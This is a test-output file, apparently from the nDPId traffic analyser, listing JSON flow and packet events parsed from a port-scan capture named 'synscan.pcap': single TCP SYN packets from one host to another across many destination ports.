-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1065,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1065,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsIdAAAC0G+aKsEAAIQA2GNIzTEVvdU4MZAAAAAGACCAAfMQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1066,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1066,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/2AAACcGIhKsEAAIQA2GNIzTxUTdU4MZAAAAAGACEABjRwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1067,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1067,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsRwMAACYG22+sEAAIQA2GNIzTCizdU4MZAAAAAGACDAAiYAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1068,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1068,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsxZYAADcGS9ysEAAIQA2GNIzTBCPdU4MZAAAAAGACEAAkaQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1069,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1069,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsUyoAACsGykisEAAIQA2GNIzTKXjdU4MZAAAAAGACEAD\/EwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1070,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1070,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsPPsAADQG13esEAAIQA2GNIzTLuDdU4MZAAAAAGACBAAFrAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1071,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1071,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsIK8AADIG9cOsEAAIQA2GNIzTeT7dU4MZAAAAAGACDACzTQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1072,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1072,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/sQAADgGEa6sEAAIQA2GNIzSIyrdUoMYAAAAAGACBAARZQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1073,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1073,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsVMoAADsGuKisEAAIQA2GNIzSF27dUoMYAAAAAGACEAARIQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1074,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1074,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsq0AAADQGaTKsEAAIQA2GNIzSJR\/dUoMYAAAAAGACBAAPcAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1075,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1075,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/zAAADgGEUKsEAAIQA2GNIzSBCbdUoMYAAAAAGACBAAwaQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1076,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1076,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAs2mcAADEGPQusEAAIQA2GNIzSBMHdUoMYAAAAAGACCAArzgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1077,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1077,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsXjcAACwGvjusEAAIQA2GNIzSw1HdUoMYAAAAAGACBABxPQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1078,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1078,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsxg8AACsGV2OsEAAIQA2GNIzSDP3dUoMYAAAAAGACEAAbkgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1079,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsAGYAADsGDQ2sEAAIQA2GNIzSA\/PdUoMYAAAAAGACEAAknAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsB0kAADQGDSqsEAAIQA2GNIzSBF3dUoMYAAAAAGACBAAwMgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsslAAAC0GaSKsEAAIQA2GNIzSBf3dUoMYAAAAAGACCAAqkgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1082,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAszUIAACcGVDCsEAAIQA2GNIzSDUzdUoMYAAAAAGACEAAbQwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ5AAACsG2eKsEAAIQA2GNIzTB\/PdU4MZAAAAAGACEAAgmQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1084,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs7zYAADIGJzysEAAIQA2GNIzTANPdU4MZAAAAAGACDAAruQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1085,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs7vQAACkGMH6sEAAIQA2GNIzTFxPdU4MZAAAAAGACCAAZeQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1086,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1086,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAswO4AADsGTISsEAAIQA2GNIzTBA3dU4MZAAAAAGACEAAkfwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsw+IAADkGS5CsEAAIQA2GNIzTFvXdU4MZAAAAAGACCAAZlwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1088,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsxCgAAC4GVkqsEAAIQA2GNIzTE+7dU4MZAAAAAGACDAAYngAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1089,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
